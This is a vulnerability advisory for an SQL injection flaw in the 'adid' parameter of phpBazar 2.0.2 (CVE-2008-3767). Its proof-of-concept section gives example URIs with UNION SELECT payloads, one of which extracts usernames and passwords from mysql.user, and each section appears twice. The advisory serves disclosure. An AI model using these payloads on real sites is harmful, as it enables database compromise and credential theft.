phpBazar 'adid' Parameter SQL Injection Vulnerability
BID:30773
Info
phpBazar 'adid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 30773 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3767 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 20 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | e.wiZz! |
| Vulnerable: |
SmartISoft phpBazar 2.0.2 |
| Not Vulnerable: | |
Discussion
phpBazar 'adid' Parameter SQL Injection Vulnerability
phpBazar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpBazar 2.0.2 and prior versions are vulnerable.
phpBazar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpBazar 2.0.2 and prior versions are vulnerable.
Exploit / POC
phpBazar 'adid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/bazar/classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
http://www.example.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
http://www.example.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/bazar/classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
http://www.example.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
http://www.example.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
Solution / Fix
phpBazar 'adid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].